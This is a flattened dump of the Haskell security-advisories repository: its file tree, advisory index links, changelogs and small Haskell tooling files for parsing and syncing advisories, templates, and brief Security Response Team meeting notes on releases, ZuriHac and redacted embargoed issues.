├── advisories
│   ├── .gitkeep
│   ├── reserved
│   │   ├── 2024
│   │   │   ├── 0004.md
│   │   │   ├── 0005.md
│   │   │   ├── HSEC-2024-0004.md
│   │   │   └── HSEC-2024-0005.md
│   │   └── .gitkeep
│   ├── ghc
│   │   └── ghc
│   │       ├── HSEC-2024-0007.md
│   │       ├── HSEC-2024-0008.md
│   │       └── HSEC-2025-0001.md
│   ├── hackage
│   │   ├── bz2
│   │   │   └── HSEC-2024-0002.md
│   │   ├── aeson
│   │   │   └── HSEC-2023-0001.md
│   │   ├── base
│   │   │   ├── HSEC-2023-0007.md
│   │   │   └── HSEC-2024-0006.md
│   │   ├── bzlib
│   │   │   └── HSEC-2024-0002.md
│   │   ├── crypton
│   │   │   └── HSEC-2025-0002.md
│   │   ├── keter
│   │   │   └── HSEC-2024-0001.md
│   │   ├── pandoc
│   │   │   └── HSEC-2023-0014.md
│   │   ├── process
│   │   │   └── HSEC-2024-0003.md
│   │   ├── xz-clib
│   │   │   └── HSEC-2025-0003.md
│   │   ├── bzlib-conduit
│   │   │   └── HSEC-2024-0002.md
│   │   ├── cabal-install
│   │   │   ├── HSEC-2023-0015.md
│   │   │   └── HSEC-2025-0005.md
│   │   ├── cryptonite
│   │   │   └── HSEC-2025-0002.md
│   │   ├── git-annex
│   │   │   ├── HSEC-2023-0009.md
│   │   │   ├── HSEC-2023-0010.md
│   │   │   ├── HSEC-2023-0011.md
│   │   │   ├── HSEC-2023-0012.md
│   │   │   └── HSEC-2023-0013.md
│   │   ├── hledger-web
│   │   │   └── HSEC-2023-0008.md
│   │   ├── spacecookie
│   │   │   └── HSEC-2025-0004.md
│   │   ├── tls-extra
│   │   │   └── HSEC-2023-0005.md
│   │   ├── toml-reader
│   │   │   └── HSEC-2023-0007.md
│   │   ├── x509-store
│   │   │   └── HSEC-2025-0006.md
│   │   ├── xml-conduit
│   │   │   └── HSEC-2023-0004.md
│   │   ├── biscuit-haskell
│   │   │   ├── HSEC-2023-0002.md
│   │   │   └── HSEC-2024-0009.md
│   │   ├── crypton-x509-store
│   │   │   └── HSEC-2025-0006.md
│   │   ├── x509-validation
│   │   │   └── HSEC-2023-0006.md
│   │   └── xmonad-contrib
│   │       └── HSEC-2023-0003.md
│   └── published
│       ├── 2023
│       │   ├── HSEC-2023-0006.md
│       │   ├── HSEC-2023-0003.md
│       │   ├── HSEC-2023-0002.md
│       │   ├── HSEC-2023-0001.md
│       │   ├── HSEC-2023-0012.md
│       │   ├── HSEC-2023-0004.md
│       │   ├── HSEC-2023-0005.md
│       │   ├── HSEC-2023-0014.md
│       │   ├── HSEC-2023-0008.md
│       │   ├── HSEC-2023-0009.md
│       │   ├── HSEC-2023-0011.md
│       │   ├── HSEC-2023-0007.md
│       │   ├── HSEC-2023-0013.md
│       │   ├── HSEC-2023-0010.md
│       │   └── HSEC-2023-0015.md
│       ├── 2024
│       │   ├── HSEC-2024-0008.md
│       │   ├── HSEC-2024-0007.md
│       │   ├── HSEC-2024-0001.md
│       │   ├── HSEC-2024-0009.md
│       │   ├── HSEC-2024-0006.md
│       │   └── HSEC-2024-0002.md
│       └── 2025
│           ├── HSEC-2025-0001.md
│           ├── HSEC-2025-0006.md
│           ├── HSEC-2025-0003.md
│           ├── HSEC-2025-0004.md
│           ├── HSEC-2025-0005.md
│           └── HSEC-2025-0002.md
├── code
│   ├── purl
│   │   ├── CHANGELOG.md
│   │   ├── README.md
│   │   └── purl.cabal
│   ├── README.md
│   ├── hsec-sync
│   │   ├── overview.png
│   │   ├── recommended-workflow.png
│   │   ├── CHANGELOG.md
│   │   ├── test
│   │   │   ├── Spec.hs
│   │   │   └── Spec
│   │   │       └── SyncSpec.hs
│   │   ├── .gitignore
│   │   ├── src
│   │   │   └── Security
│   │   │       └── Advisories
│   │   │           ├── Sync
│   │   │           │   └── Url.hs
│   │   │           └── Sync.hs
│   │   ├── README.md
│   │   ├── hsec-sync.cabal
│   │   └── app
│   │       └── Main.hs
│   ├── hsec-tools
│   │   ├── test
│   │   │   ├── golden
│   │   │   │   ├── MISSING_TITLE.md.golden
│   │   │   │   ├── MISSING_AFFECTED.md
│   │   │   │   ├── MISSING_TITLE.md
│   │   │   │   ├── MISSING_AFFECTED.md.golden
│   │   │   │   ├── EXAMPLE_ADVISORY_GHC.md
│   │   │   │   ├── EXAMPLE_ADVISORY_HACKAGE.md
│   │   │   │   └── EXAMPLE_ADVISORY_REPO.md
│   │   │   └── Spec.hs
│   │   ├── assets
│   │   │   ├── images
│   │   │   │   └── hf-logo.png
│   │   │   └── css
│   │   │       └── default.css
│   │   ├── src
│   │   │   └── Security
│   │   │       ├── Advisories.hs
│   │   │       └── Advisories
│   │   │           ├── Generate
│   │   │           │   ├── TH.hs
│   │   │           │   └── Snapshot.hs
│   │   │           ├── Queries.hs
│   │   │           └── Git.hs
│   │   ├── app
│   │   │   ├── Command
│   │   │   │   ├── NextID.hs
│   │   │   │   └── Reserve.hs
│   │   │   └── Util.hs
│   │   ├── README.md
│   │   ├── .gitignore
│   │   └── CHANGELOG.md
│   ├── osv
│   │   ├── test
│   │   │   └── Spec.hs
│   │   ├── README.md
│   │   ├── CHANGELOG.md
│   │   ├── .gitignore
│   │   └── osv.cabal
│   ├── cvss
│   │   ├── README.md
│   │   ├── CHANGELOG.md
│   │   ├── cvss.cabal
│   │   └── test
│   │       └── Spec.hs
│   ├── hsec-core
│   │   ├── test
│   │   │   └── Spec.hs
│   │   ├── CHANGELOG.md
│   │   ├── README.md
│   │   ├── .gitignore
│   │   ├── hsec-core.cabal
│   │   └── src
│   │       └── Security
│   │           └── Advisories
│   │               └── Core
│   │                   └── HsecId.hs
│   └── LICENSE.txt
├── .gitignore
├── .envrc
├── .mailmap
├── shell.nix
├── cabal.project
├── .github
│   ├── PULL_REQUEST_TEMPLATE.md
│   ├── ISSUE_TEMPLATE
│   │   ├── hsec-tools.md
│   │   └── advisory.md
│   └── haskell-ci.patch
├── meeting-notes
│   ├── 2025-04-30.md
│   ├── 2025-07-23.md
│   ├── 2025-09-04.md
│   ├── 2025-10-30.md
│   ├── 2025-12-10.md
│   ├── 2023-09-20.md
│   ├── 2024-10-30.md
│   ├── 2025-04-17.md
│   ├── 2023-10-04.md
│   ├── 2025-05-28.md
│   ├── 2025-06-25.md
│   ├── 2024-02-21.md
│   ├── 2025-02-05.md
│   ├── 2025-08-07.md
│   ├── 2023-11-01.md
│   ├── 2025-04-02.md
│   ├── 2023-12-13.md
│   ├── 2024-01-24.md
│   ├── 2025-11-27.md
│   ├── 2024-12-11.md
│   ├── 2025-08-20.md
│   ├── 2024-02-07.md
│   ├── 2024-07-10.md
│   ├── 2023-11-29.md
│   ├── 2025-06-12.md
│   ├── 2024-08-21.md
│   ├── 2024-04-17.md
│   ├── 2024-05-15.md
│   ├── 2023-11-15.md
│   ├── 2024-03-20.md
│   ├── 2025-05-15.md
│   ├── 2024-06-26.md
│   ├── 2025-01-08.md
│   ├── 2024-03-06.md
│   ├── 2024-08-07.md
│   ├── 2024-11-13.md
│   ├── 2024-01-10.md
│   ├── 2025-02-20.md
│   ├── 2023-10-18.md
│   ├── 2023-08-23.md
│   ├── 2025-03-20.md
│   ├── 2024-06-12.md
│   ├── 2024-10-02.md
│   ├── 2023-05-17.md
│   ├── 2024-09-04.md
│   ├── 2024-11-27.md
│   ├── 2024-05-29.md
│   ├── 2023-07-12.md
│   ├── 2024-07-24.md
│   ├── 2025-07-10.md
│   ├── 2024-05-01.md
│   ├── 2023-07-26.md
│   ├── 2023-06-28.md
│   ├── 2023-05-31.md
│   ├── 2024-10-16.md
│   ├── 2024-04-03.md
│   ├── 2023-06-15.md
│   └── 2023-08-09.md
├── docs
│   ├── README.md
│   ├── packages.md
│   ├── reports.md
│   ├── call-for-volunteers-example.md
│   └── membership.md
├── LICENSE.txt
├── flake.lock
├── EXAMPLE_ADVISORY.md
├── CONTRIBUTING.md
├── flake.nix
└── reports
    └── 2025-04-04-Q1-report.md

/advisories/.gitkeep:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/advisories/reserved/.gitkeep:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/advisories/reserved/2024/0004.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/advisories/reserved/2024/0005.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/advisories/reserved/2024/HSEC-2024-0004.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/advisories/reserved/2024/HSEC-2024-0005.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/code/purl/CHANGELOG.md:
--------------------------------------------------------------------------------
# 0.1.0.0

Introduction
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
*~
dist-newstyle/
result
.direnv
.env
--------------------------------------------------------------------------------
/.envrc:
--------------------------------------------------------------------------------
use flake

if [ -f .env ]; then
  . .env
fi
--------------------------------------------------------------------------------
/.mailmap:
--------------------------------------------------------------------------------
Fraser Tweedale
--------------------------------------------------------------------------------
/advisories/ghc/ghc/HSEC-2024-0007.md:
--------------------------------------------------------------------------------
../../published/2024/HSEC-2024-0007.md
--------------------------------------------------------------------------------
/advisories/ghc/ghc/HSEC-2024-0008.md:
--------------------------------------------------------------------------------
../../published/2024/HSEC-2024-0008.md
--------------------------------------------------------------------------------
/advisories/ghc/ghc/HSEC-2025-0001.md:
--------------------------------------------------------------------------------
../../published/2025/HSEC-2025-0001.md
--------------------------------------------------------------------------------
/advisories/hackage/bz2/HSEC-2024-0002.md:
--------------------------------------------------------------------------------
../../published/2024/HSEC-2024-0002.md
--------------------------------------------------------------------------------
/code/README.md:
--------------------------------------------------------------------------------
This directory contains code for working with advisories.
--------------------------------------------------------------------------------
/advisories/hackage/aeson/HSEC-2023-0001.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0001.md
--------------------------------------------------------------------------------
/advisories/hackage/base/HSEC-2023-0007.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0007.md
--------------------------------------------------------------------------------
/advisories/hackage/base/HSEC-2024-0006.md:
--------------------------------------------------------------------------------
../../published/2024/HSEC-2024-0006.md
--------------------------------------------------------------------------------
/advisories/hackage/bzlib/HSEC-2024-0002.md:
--------------------------------------------------------------------------------
../../published/2024/HSEC-2024-0002.md
--------------------------------------------------------------------------------
/advisories/hackage/crypton/HSEC-2025-0002.md:
--------------------------------------------------------------------------------
../../published/2025/HSEC-2025-0002.md
--------------------------------------------------------------------------------
/advisories/hackage/keter/HSEC-2024-0001.md:
--------------------------------------------------------------------------------
../../published/2024/HSEC-2024-0001.md
--------------------------------------------------------------------------------
/advisories/hackage/pandoc/HSEC-2023-0014.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0014.md
--------------------------------------------------------------------------------
/advisories/hackage/process/HSEC-2024-0003.md:
--------------------------------------------------------------------------------
../../published/2024/HSEC-2024-0003.md
--------------------------------------------------------------------------------
/advisories/hackage/xz-clib/HSEC-2025-0003.md:
--------------------------------------------------------------------------------
../../published/2025/HSEC-2025-0003.md
--------------------------------------------------------------------------------
/advisories/hackage/bzlib-conduit/HSEC-2024-0002.md:
--------------------------------------------------------------------------------
../../published/2024/HSEC-2024-0002.md
--------------------------------------------------------------------------------
/advisories/hackage/cabal-install/HSEC-2023-0015.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0015.md
--------------------------------------------------------------------------------
/advisories/hackage/cabal-install/HSEC-2025-0005.md:
--------------------------------------------------------------------------------
../../published/2025/HSEC-2025-0005.md
--------------------------------------------------------------------------------
/advisories/hackage/cryptonite/HSEC-2025-0002.md:
--------------------------------------------------------------------------------
../../published/2025/HSEC-2025-0002.md
--------------------------------------------------------------------------------
/advisories/hackage/git-annex/HSEC-2023-0009.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0009.md
--------------------------------------------------------------------------------
/advisories/hackage/git-annex/HSEC-2023-0010.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0010.md
--------------------------------------------------------------------------------
/advisories/hackage/git-annex/HSEC-2023-0011.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0011.md
--------------------------------------------------------------------------------
/advisories/hackage/git-annex/HSEC-2023-0012.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0012.md
--------------------------------------------------------------------------------
/advisories/hackage/git-annex/HSEC-2023-0013.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0013.md
--------------------------------------------------------------------------------
/advisories/hackage/hledger-web/HSEC-2023-0008.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0008.md
--------------------------------------------------------------------------------
/advisories/hackage/spacecookie/HSEC-2025-0004.md:
--------------------------------------------------------------------------------
../../published/2025/HSEC-2025-0004.md
--------------------------------------------------------------------------------
/advisories/hackage/tls-extra/HSEC-2023-0005.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0005.md
--------------------------------------------------------------------------------
/advisories/hackage/toml-reader/HSEC-2023-0007.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0007.md
--------------------------------------------------------------------------------
/advisories/hackage/x509-store/HSEC-2025-0006.md:
--------------------------------------------------------------------------------
../../published/2025/HSEC-2025-0006.md
--------------------------------------------------------------------------------
/advisories/hackage/xml-conduit/HSEC-2023-0004.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0004.md
--------------------------------------------------------------------------------
/advisories/hackage/biscuit-haskell/HSEC-2023-0002.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0002.md
--------------------------------------------------------------------------------
/advisories/hackage/biscuit-haskell/HSEC-2024-0009.md:
--------------------------------------------------------------------------------
../../published/2024/HSEC-2024-0009.md
--------------------------------------------------------------------------------
/advisories/hackage/crypton-x509-store/HSEC-2025-0006.md:
--------------------------------------------------------------------------------
../../published/2025/HSEC-2025-0006.md
--------------------------------------------------------------------------------
/advisories/hackage/x509-validation/HSEC-2023-0006.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0006.md
--------------------------------------------------------------------------------
/advisories/hackage/xmonad-contrib/HSEC-2023-0003.md:
--------------------------------------------------------------------------------
../../published/2023/HSEC-2023-0003.md
--------------------------------------------------------------------------------
/shell.nix:
--------------------------------------------------------------------------------
(builtins.getFlake ("git+file://" + toString ./.)).devShell.${builtins.currentSystem}
--------------------------------------------------------------------------------
/code/hsec-sync/overview.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haskell/security-advisories/HEAD/code/hsec-sync/overview.png
--------------------------------------------------------------------------------
/code/hsec-tools/test/golden/MISSING_TITLE.md.golden:
--------------------------------------------------------------------------------
Left
    ( MarkdownFormatError "Does not have summary heading" )

--------------------------------------------------------------------------------
/code/hsec-sync/recommended-workflow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haskell/security-advisories/HEAD/code/hsec-sync/recommended-workflow.png
--------------------------------------------------------------------------------
/code/hsec-tools/test/golden/MISSING_AFFECTED.md:
--------------------------------------------------------------------------------
```toml
[advisory]
id = "HSEC-0000-0000"
cwe = []
```

## Title
--------------------------------------------------------------------------------
/code/hsec-tools/test/golden/MISSING_TITLE.md:
--------------------------------------------------------------------------------
```toml
[advisory]
id = "HSEC-0000-0000"
cwe = []
date = 1970-01-01
```
--------------------------------------------------------------------------------
/code/hsec-tools/assets/images/hf-logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/haskell/security-advisories/HEAD/code/hsec-tools/assets/images/hf-logo.png
--------------------------------------------------------------------------------
/cabal.project:
--------------------------------------------------------------------------------
packages: code/*/*.cabal

package hsec-core
package hsec-tools
package hsec-sync
package cvss
package osv
package purl

test-show-details: direct
--------------------------------------------------------------------------------
/code/hsec-sync/CHANGELOG.md:
--------------------------------------------------------------------------------
## 0.2.0.2

* Update `tasty` dependency bounds

## 0.2.0.0

* Rewrite, using `hsec-tools` snapshots

## 0.1.0.0

* Introduction, `git`-based
--------------------------------------------------------------------------------
/code/osv/test/Spec.hs:
--------------------------------------------------------------------------------
{-# LANGUAGE OverloadedStrings #-}

module Main where

import Test.Tasty

main :: IO ()
main =
  defaultMain $
    testGroup "Tests"
      []
--------------------------------------------------------------------------------
/code/cvss/README.md:
--------------------------------------------------------------------------------
# cvss

This project aims to support [Common Vulnerability Scoring System](https://www.first.org/cvss/).

## Building

We aim to support both regular cabal-based and nix-based builds.
--------------------------------------------------------------------------------
/code/osv/README.md:
--------------------------------------------------------------------------------
# osv

This project aims to support [Open Source Vulnerability format](https://ossf.github.io/osv-schema/).

## Building

We aim to support both regular cabal-based and nix-based builds.
--------------------------------------------------------------------------------
/code/purl/README.md:
--------------------------------------------------------------------------------
# purl

This project aims to support [purl (universal package URL)](https://github.com/package-url/purl-spec).

## Building

We aim to support both regular cabal-based and nix-based builds.
--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------

---

## Advisory

- [ ] It's not duplicated
- [ ] All fields are filled
- [ ] It is validated by `hsec-tools`

## hsec-tools

- [ ] Previous advisories are still valid
--------------------------------------------------------------------------------
/code/cvss/CHANGELOG.md:
--------------------------------------------------------------------------------
## 0.2.0.1

* Update `tasty` dependency bounds

## 0.2

* Changed the CVSS v2 parser and printer to omit the "CVSS:2.0/" version prefix according to the spec.

## 0.1

* Introduction
--------------------------------------------------------------------------------
/code/hsec-core/test/Spec.hs:
--------------------------------------------------------------------------------
module Main where

import Test.Tasty
import qualified Spec.QueriesSpec as QueriesSpec

main :: IO ()
main =
  defaultMain $
    testGroup
      "Tests"
      [QueriesSpec.spec]
--------------------------------------------------------------------------------
/meeting-notes/2025-04-30.md:
--------------------------------------------------------------------------------
# SRT meeting 2025-04-30

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-04-17.md


## ZuriHac + Ecosystem Workshop

- Gautier confirmed.
- Fraser cannot come.
--------------------------------------------------------------------------------
/meeting-notes/2025-07-23.md:
--------------------------------------------------------------------------------
# SRT meeting 2025-07-23

Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-07-10.md

## Package release

* Gautier bumped all package versions
* Waiting for Fraser to add other HSRT members to the maintainers list
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/hsec-tools.md:
--------------------------------------------------------------------------------
---
name: hsec-tools related
about: Bug or suggestion about hsec-tools
title: ''
labels: hsec-tools
assignees: ''

---

## Summary

## Steps to reproduce

## Expected behavior

## Cause of the bug
--------------------------------------------------------------------------------
/code/hsec-sync/test/Spec.hs:
--------------------------------------------------------------------------------
{-# LANGUAGE OverloadedStrings #-}

module Main where

import Test.Tasty

import qualified Spec.SyncSpec as SyncSpec

main :: IO ()
main = do
  defaultMain $
    testGroup "Tests"
      [ SyncSpec.spec
      ]
--------------------------------------------------------------------------------
/code/osv/CHANGELOG.md:
--------------------------------------------------------------------------------
# 0.2.0.0

* Rely on `purl` for `Security.OSV.Package.packageUrl`
* Update `tasty` dependency bounds

# 0.1.0.2

* Update dependencies bounds

# 0.1.0.1

* Fix `cvss` dependency bounds

# 0.1.0.0

* Introduction
--------------------------------------------------------------------------------
/code/hsec-tools/src/Security/Advisories.hs:
--------------------------------------------------------------------------------
module Security.Advisories
  ( module Security.Advisories.Core.Advisory
  , module Security.Advisories.Core.HsecId
  , module Security.Advisories.Parse
  )
  where

import Security.Advisories.Core.Advisory
import Security.Advisories.Core.HsecId
import Security.Advisories.Parse
--------------------------------------------------------------------------------
/meeting-notes/2025-09-04.md:
--------------------------------------------------------------------------------
# SRT meeting 2025-09-04

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-08-20.md

## Status on embargoed advisory
(redacted)

## Security "prospectus"

Fraser wrote the initial draft of a prospectus for funding Haskell ecosystem security work.
--------------------------------------------------------------------------------
/meeting-notes/2025-10-30.md:
--------------------------------------------------------------------------------

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-09-04.md

## Status on embargoed advisory
(redacted)

## Re-layout

Tristan and Gautier fixed links in the [re-layout PR](https://github.com/haskell/security-advisories/pull/293), making it ready to merge.
--------------------------------------------------------------------------------
/code/hsec-core/CHANGELOG.md:
--------------------------------------------------------------------------------
## 0.3.0.0

* Add `Repository` and `ComponentIdentifier` in `Security.Advisories.Core.Advisory`

## 0.2.1.0

* Introduce `isVersionAffectedBy` and `isVersionRangeAffectedBy` in `Security.Advisories.Core`

## 0.2.0.2

* Update `osv` dependency bounds
* Update `tasty` dependency bounds

--------------------------------------------------------------------------------
/meeting-notes/2025-12-10.md:
--------------------------------------------------------------------------------
# SRT meeting 2025-12-10

Previously: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-11-27.md

## Status on embargoed advisory
(redacted)

## Other works

Gautier started to [add support for other namespaces (#240)](https://github.com/haskell/security-advisories/pull/306).
--------------------------------------------------------------------------------
/code/hsec-tools/app/Command/NextID.hs:
--------------------------------------------------------------------------------
module Command.NextID where

import Security.Advisories.Core.HsecId (printHsecId, getNextHsecId)
import Security.Advisories.Filesystem (getGreatestId)

import Util (ensureRepo)

runNextIDCommand :: Maybe FilePath -> IO ()
runNextIDCommand mPath =
  ensureRepo mPath >>= getGreatestId >>= getNextHsecId >>= putStrLn . printHsecId
--------------------------------------------------------------------------------
/code/hsec-core/README.md:
--------------------------------------------------------------------------------
# hsec-core

`hsec-core` aims to support [Haskell advisories database](https://github.com/haskell/security-advisories).

## Building

We aim to support both regular cabal-based and nix-based builds.

## Testing

Run (and auto update) the golden test:

```ShellSession
cabal test -O0 --test-show-details=direct --test-option=--accept
```
--------------------------------------------------------------------------------
/code/hsec-tools/README.md:
--------------------------------------------------------------------------------
# hsec-tools

`hsec-tools` aims to support [Haskell advisories database](https://github.com/haskell/security-advisories).

## Building

We aim to support both regular cabal-based and nix-based builds.

## Testing

Run (and auto update) the golden test:

```ShellSession
cabal test -O0 --test-show-details=direct --test-option=--accept
```
--------------------------------------------------------------------------------
/code/osv/.gitignore:
--------------------------------------------------------------------------------
##### Haskell
dist
dist-*
cabal-dev
*.o
*.hi
*.hie
*.chi
*.chs.h
*.dyn_o
*.dyn_hi
.hpc
.hsenv
.cabal-sandbox/
cabal.sandbox.config
*.prof
*.aux
*.hp
*.eventlog
.stack-work/
cabal.project.local
cabal.project.local~
.HTF/
.ghc.environment.*
build
bin-*

result
.direnv
.env
--------------------------------------------------------------------------------
/code/hsec-core/.gitignore:
--------------------------------------------------------------------------------
##### Haskell
dist
dist-*
cabal-dev
*.o
*.hi
*.hie
*.chi
*.chs.h
*.dyn_o
*.dyn_hi
.hpc
.hsenv
.cabal-sandbox/
cabal.sandbox.config
*.prof
*.aux
*.hp
*.eventlog
.stack-work/
cabal.project.local
cabal.project.local~
.HTF/
.ghc.environment.*
build
bin-*

result
.direnv
.env
--------------------------------------------------------------------------------
/code/hsec-sync/.gitignore:
--------------------------------------------------------------------------------
##### Haskell
dist
dist-*
cabal-dev
*.o
*.hi
*.hie
*.chi
*.chs.h
*.dyn_o
*.dyn_hi
.hpc
.hsenv
.cabal-sandbox/
cabal.sandbox.config
*.prof
*.aux
*.hp
*.eventlog
.stack-work/
cabal.project.local
cabal.project.local~
.HTF/
.ghc.environment.*
build
bin-*

result
.direnv
.env
--------------------------------------------------------------------------------
/meeting-notes/2023-09-20.md:
--------------------------------------------------------------------------------
- SRT 2023/09/20

# Present
- Gautier
- Mihai
- David
- Casey

# hsec-tools
- casey: need to rebase changes regarding purl spec code and sync up with Fraser about his comments about the specification.
- mihai: embargo status and still working on GHCup review

# security scanner
- david: had a conversation about the need for a security scanner.
--------------------------------------------------------------------------------
/meeting-notes/2024-10-30.md:
--------------------------------------------------------------------------------
# SRT meeting 2024-10-30

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-10-16.md

## Call for Volunteers

We received the candidatures and voted for the new members to be announced.

## GHC Math bugs

The advisories are updated and available for review: [#214](https://github.com/haskell/security-advisories/pull/214)
--------------------------------------------------------------------------------
/code/hsec-tools/.gitignore:
--------------------------------------------------------------------------------
##### Haskell
dist
dist-*
cabal-dev
*.o
*.hi
*.hie
*.chi
*.chs.h
*.dyn_o
*.dyn_hi
.hpc
.hsenv
.cabal-sandbox/
cabal.sandbox.config
*.prof
*.aux
*.hp
*.eventlog
.stack-work/
cabal.project.local
cabal.project.local~
.HTF/
.ghc.environment.*
build
bin-*

result
.direnv
.env
--------------------------------------------------------------------------------
/meeting-notes/2025-04-17.md:
--------------------------------------------------------------------------------
# SRT meeting 2025-04-17

Present: Gautier, Montez

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-04-02.md

## Embargoed ``hackage-server``

- Some mitigations have already been pushed
- Fraser drives the next fixes

## HSEC-2025-0003: Use after free in multithreaded lzma (.xz) decoder

- Published and fixed
--------------------------------------------------------------------------------
/meeting-notes/2023-10-04.md:
--------------------------------------------------------------------------------
- SRT 2023/10/04

# Present
- Gautier
- Tristan

# Pull-Requests
- Gautier: many PRs are stalling, while being approved
- Gautier: rebase PRs and merge them if there are enough approvals

# Embargo update
- Tristan: still waiting for upstream release, should we make the advisory public?

# Action items
- Let's merge the open PRs unless there is an objection
--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/advisory.md:
--------------------------------------------------------------------------------
---
name: advisory
about: declare a (potential) vulnerability
title: ''
labels: advisory
assignees: ''

---

Mandatory information:

* Package : `?`
* cvss: `?`
* affected versions: `?`

Optional:

* cve: `?`
* keywords: `?`
* aliases: `?`
* related: `?`
* affected OSes: `?`
* affected architecture: `?`
* declarations: `?`
* Long description: `?`
--------------------------------------------------------------------------------
/docs/README.md:
--------------------------------------------------------------------------------
# Haskell Security Response Team documentation

The files in this directory document the functional and
administrative processes of the Haskell Security Response Team.

- [SRT membership processes](./membership.md)
- [Quarterly reports](./reports.md)
- [SRT-owned Hackage packages and maintainership policies](./packages.md)

Documentation for our tools, libraries and the advisory source
format lives in the `code/` directory of the main repo.
--------------------------------------------------------------------------------
/meeting-notes/2025-05-28.md:
--------------------------------------------------------------------------------
# SRT meeting 2025-05-28

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-05-15.md

## haskell.org listing vulnerability report

* We received a vulnerability report on 2025-05-27
* We are able to list directories when there is no `index.html`, which is an Apache misconfiguration
* Since all the assets are on GitHub, it is not a problem

## ZuriHac

* Gautier, Jose, and Tristan will attend
--------------------------------------------------------------------------------
/meeting-notes/2025-06-25.md:
--------------------------------------------------------------------------------
# SRT meeting 2025-06-25

Attended: Gautier, Jose, Montez

Previously:
https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-06-12.md

## Vulnerabilities

- No new vulnerabilities
- Gautier will ping @dcouts on [cabal dependency confusion advisory](https://github.com/haskell/security-advisories/pull/281)

## Pending work

- Gautier looks for feedback on [purl](https://github.com/haskell/security-advisories/pull/282)
--------------------------------------------------------------------------------
/code/hsec-tools/test/golden/MISSING_AFFECTED.md.golden:
--------------------------------------------------------------------------------
Left
    ( AdvisoryError
        [ MatchMessage
            { matchAnn = Just
                ( Position
                    { posIndex = 0
                    , posLine = 1
                    , posColumn = 1
                    }
                )
            , matchPath = []
            , matchMessage = "missing key: affected"
            }
        ] "1:1: missing key: affected in
"
    )

--------------------------------------------------------------------------------
/meeting-notes/2024-02-21.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-02-21 2 | 3 | Previous meeting notes: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-02-07.md 5 | 6 | ## Ongoing security issue (embargoed) 7 | 8 | - Mihai waits for Google approval to share the guidelines (hopefully today or tomorrow) 9 | 10 | ## Small CLI improvements 11 | 12 | - [#148](https://github.com/haskell/security-advisories/pull/148) some progress has been made, but the PR is still in draft 13 | 14 | ## ZuriHac workshop 15 | 16 | - Two days have been nearly filled 17 | - Jose will coordinate HRT and Hackage team 18 | -------------------------------------------------------------------------------- /meeting-notes/2025-02-05.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-02-05 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-01-08.md 5 | 6 | ## 2024 Q4 report (draft) 7 | 8 | - PR: https://github.com/haskell/security-advisories/pull/260 9 | - Please review. FT will publish in ~24h. 10 | 11 | 12 | ## New meeting time: 13 | 14 | - Proposal: **Thursday** UTC 12:00. It works for Lei, Gautier, Fraser. 15 | - Lock it in. Next meeting (2025-02-20) will be at the new time. 16 | - How to change the Google Calendar event? FT will follow up. 17 | - It belongs to Jose, we think. 18 | -------------------------------------------------------------------------------- /meeting-notes/2025-08-07.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-08-07 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-07-23.md 5 | 6 | ## GitHub advisory database registration 7 | 8 | * https://github.com/haskell/security-advisories/issues/11 9 | * Gautier is starting the work. 
